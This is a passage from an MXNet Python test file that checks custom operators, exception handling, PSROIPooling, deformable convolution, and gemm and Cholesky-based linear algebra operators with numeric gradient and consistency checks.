self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
                feat_height = int(image_height * spatial_scale)
                feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# For now, only the GPU implementation is available
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condition holds, the sampling location is not differentiable,
# so we re-draw the offsets and repeat the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
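# A minimal sketch (not used by the tests) of the check performed above: a bilinear
# sampling location counts as non-differentiable for the numeric gradient when it falls
# (almost) exactly on the integer grid, because floor/ceil change value there. The helper
# name and the eps default are illustrative only.
def _is_differentiable_sample_location(h, w, eps=1e-3):
    return not (h - math.floor(h) < eps or math.ceil(h) - h < eps or
                w - math.floor(w) < eps or math.ceil(w) - w < eps)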
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = int(image_height * spatial_scale)
feat_width = int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points the bilinear interpolation is not differentiable,
# so we check that the sampling locations fall on valid (differentiable) points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# For now, only the GPU implementation is available
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
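# NumPy reference for the non-batched forward results checked above, kept as an
# illustrative sketch: linalg.gemm computes alpha * dot(op(A), op(B)) + beta * C, where
# op() is an optional transpose. The helper below is not used by the tests.
def _np_gemm_reference(a, b, c, alpha=1.0, beta=1.0, transpose_a=False, transpose_b=False):
    a = a.T if transpose_a else a
    b = b.T if transpose_b else b
    return alpha * np.dot(a, b) + beta * c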
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_context().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
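# For reference: the symbolic mask assembled above is simply a lower-triangular matrix of
# ones (or its transpose when lower=False). An equivalent numpy sketch, illustrative only:
def _np_triangle_mask(m, lower=True, dtype=np.float32):
    mask = np.tril(np.ones((m, m), dtype=dtype))
    return mask if lower else mask.T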
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: the input has to be symmetrized for the gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
